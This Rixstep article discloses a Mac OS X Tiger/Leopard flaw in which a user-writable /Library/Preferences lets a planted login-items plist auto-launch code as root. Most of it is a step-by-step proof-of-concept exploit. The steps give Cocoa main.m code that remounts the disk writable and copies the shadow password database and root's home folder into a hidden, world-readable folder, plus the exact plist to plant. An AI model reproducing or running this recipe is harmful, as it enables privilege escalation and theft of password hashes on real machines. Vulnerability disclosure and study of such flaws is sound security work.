Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Home » Industry Watch

Get Root on 10.5.4

There's a wide open door on 'ten-five-four'.


Get It

Try It

It's possible to 'root' Apple's latest update of their operating system OS X 'Leopard' without hacking or in any way making an effort. Both Tiger and Leopard have a wide open door: another design flaw.

/Library/Preferences

Apple like to put sensitive system data in the widely accessible directory /Library. This has resulted in security catastrophes in the past but Apple have not changed their policy.

Today's infinite bloop concerns the path /Library/Preferences. On both Tiger and Leopard it's marked root:admin 0775.

Many of the files at this path are marked root:admin 0644 but that doesn't matter: as the directory doesn't protect the removal or replacement of files.

com.apple.systemloginitems.plist

Apple used to have this problem: startup items. Anyone could place a package at the appropriate path in /Library, then wait for a reboot, then own the entire machine. No hacking required.

This security hole turned up about the time Jaguar was released; in early 2003 a script was developed to highlight the hole as Apple staunchly refused to do anything about it; in October 2003 the script became known as 'Opener' and caused quite a stir.

Between October 2003 - the release of Panther - and April 2005 Apple did nothing. That more people weren't hacked was pure luck.

Tiger addressed the startup items hole on 29 April 2005 - but at the same time introduced another hole, an almost bigger hole, that exists in OS X to this day.

The following 'POC' exploit has been tested on both Tiger 10.4 and a fully updated Leopard 10.5.4 and it works like a charm.

Almost anyone can root Apple's fully updated operating system.

How You Root 10.5.4

Rooting Apple's OS X 10.5.4 is actually rather simple.

1. Install the ADC tools. You're going to build a Cocoa application but don't worry: you won't have to code anything.

2. Start a new Cocoa application project. Name it what you want. Such as 'SLIHack'.

3. Go into your NIB file. This is 'MainMenu.nib'.

4. Create a class. Under NSObject. Name it what you want. Such as 'SLIHack'.

5. Create files for and instantiate your new class.

6. Remove both the menu and the window from the NIB. Then save the NIB and close IB.

7. Edit a file. The file is main.m. You want it to look like this.

int main(int argc, const char *argv[]) {
    system("/sbin/mount -uw /");
    system("/bin/mkdir /Users/Shared/.SLIHack");
    system("cp -R /private/var/db/shadow /Users/Shared/.SLIHack");
    system("cp -R /private/var/root /Users/Shared/.SLIHack");
    system("chown -R nobody:staff /Users/Shared/.SLIHack");
    system("chmod -R 0777 /Users/Shared/.SLIHack");
    return NSApplicationMain(argc, argv);
}

8. Build the app. You'll now have a Cocoa bundle under the path 'build' in your project directory.

9. Move the Cocoa bundle. To '/Users/Shared'.

10. Copy the following to a plain text file. Save it as '/Library/Preferences/com.apple.systemloginitems.plist'.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>AutoLaunchedApplicationDictionary</key>
    <array>
        <dict>
            <key>Hide</key>
            <true/>
            <key>Path</key>
            <string>/Users/Shared/SLIHack.app</string>
        </dict>
    </array>
</dict>
</plist>

All you do now is reboot. Once you've logged in you'll find the telltale files at '/Users/Shared'.

See Also
Learning Curve: Rooting 10.5.4

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.